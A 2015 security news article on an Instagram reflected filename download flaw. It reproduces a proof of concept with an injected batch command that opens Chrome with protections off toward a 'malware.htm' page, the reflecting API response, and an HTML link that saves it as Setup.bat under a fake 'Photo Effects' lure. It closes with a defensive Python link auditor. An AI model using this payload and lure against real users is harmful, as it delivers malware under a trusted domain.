Instagram RFD Vulnerability could be exploited to serve Malware

WebSegura, an independent group of Portuguese security researchers, has released a proof of concept showing how Instagram can be exploited to spread malware to Instagram users. David Sopas, one of the researchers in the group, found an RFD (Reflected Filename Download) vulnerability in the Instagram API which can lead to serious damage. By simply entering batch commands into a profile field and creating a reflected filename download link, a series of attacks can be carried out in which the download appears to come directly from Instagram's own computers.

Technical Details

David Sopas first created a new account, from which a token was generated and used to exploit the vulnerability. Next he inserted batch commands into the user Bio field, mentioning that other similar fields can be exploited as well. The command used in this step opens Chrome with its privacy and security protection measures turned off:

||start chrome websegura.net/malware.htm --disable-web-security --disable-popup-blocking||
Requesting the Instagram API JSON for this new user now returns the following:
https://api.instagram.com/v1/users/1750545056?access_token=339779002.4538cdb.fad79bd258364f4992156372fd01069a
{"meta":{"code":200},"data":{"username":"davidsopas","bio":"\"||start chrome websegura.net\/malware.htm --disable-web-security --disable-popup-blocking||","website":"http:\/\/websegura.net","profile_picture":"https:\/\/igcdn-photos-f-a.akamaihd.net\/hphotos-ak-xaf1\/t51.2885-19\/11055505_1374264689564237_952365304_a.jpg","full_name":"David Sopas","counts":{"media":0,"followed_by":11,"follows":3},"id":"1750545056"}}
With the reflected part done, the filename part is targeted next.
Because of filename restrictions on the Instagram path, the HTML5 download attribute has to be used to set the filename. As a result, "only" the following browsers are supported:
  • Chrome
  • Opera
  • Android Browser
  • Chrome for Android
  • Firefox [forcing the user to “Save Link As”]
This can be replicated with the following HTML code:
<a href="https://api.instagram.com/v1/users/1750545056?access_token=339779002.4538cdb.fad79bd258364f4992156372fd01069a" download="Setup.bat" onclick="return false;">Install Instagram new Photo Effects</a>
Ultimately, this works in the attacker's favour: to every user the download link appears to be hosted on Instagram.com [a trusted domain], which gains credibility with the victim.
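A defender reviewing pages or message content can look for this link shape: a download attribute that forces an executable filename onto a URL whose path does not carry that extension. The Python check below is an added example, not code from the original post or from WebSegura; the extension list and the host, user id and token in the sample page are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit
import posixpath

# Extensions Windows runs on double-click (illustrative list, not exhaustive).
RISKY_EXTENSIONS = {".bat", ".cmd", ".com", ".exe", ".js", ".ps1", ".scr", ".vbs"}


class DownloadLinkAuditor(HTMLParser):
    """Collects <a download=...> links whose saved name and URL path disagree."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        attr = dict(attrs)
        saved_as = attr.get("download")  # None when the attribute has no value
        href = attr.get("href")
        if not saved_as or not href:
            return
        saved_ext = posixpath.splitext(saved_as)[1].lower()
        url = urlsplit(href)
        url_ext = posixpath.splitext(url.path)[1].lower()
        # RFD pattern: the link forces an executable filename that the URL
        # path itself does not carry (for example a JSON API endpoint).
        if saved_ext in RISKY_EXTENSIONS and saved_ext != url_ext:
            self.findings.append(
                {"host": url.hostname, "path": url.path, "saved_as": saved_as}
            )


def audit_html(html):
    """Return one finding per suspicious download link in the given HTML."""
    auditor = DownloadLinkAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed sample: one link shaped like the article's PoC (placeholder host,
# id and token) and one ordinary download that must not be flagged.
SAMPLE_PAGE = """
<a href="https://api.example.test/v1/users/1?access_token=PLACEHOLDER"
   download="Setup.bat">Install new Photo Effects</a>
<a href="/files/report.pdf" download="report.pdf">Quarterly report</a>
"""

if __name__ == "__main__":
    for finding in audit_html(SAMPLE_PAGE):
        print(finding)
```

The same comparison can be applied in a mail or proxy content filter; the host in each finding shows which trusted domain the link is borrowing credibility from.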

Effect of the Instagram RFD vulnerability:

  1. Malicious user posts a new message to all his Instagram friends linking to a specially crafted page
  2. Victim clicks on the link, checks that the file is stored on Instagram servers, and runs it
  3. Victim has been infected with malware
A PoC video released by David Sopas can be found below, showing the whole concept step-by-step.



David reported this vulnerability to Facebook, along with the patch, on 15th of March 2015, but it was rejected as not being a vulnerability. So this is still an open vulnerability.
David says that these types of vulnerabilities need to be taken seriously by companies, as they may well lead to serious damage one way or another.
This can be compared to the Google Drive phishing campaign, in which an original Google Drive link was used. Similarly, the Instagram RFD vulnerability could prove a huge success for a phishing campaign in which the malicious link comes directly from Instagram, making the victim more likely to click the link without suspicion, and perhaps even to hand over credentials readily on seeing HTTPS in the link. The very recent Cryptolocker/ransomware attacks by cybercriminals could also get a major boost from this vulnerability, which provides a download link for the malware hosted directly on Instagram servers, again leaving no doubt in users' minds before they download the malicious file.
Reviewed by Unknown on 3/26/2015 Rating: 5
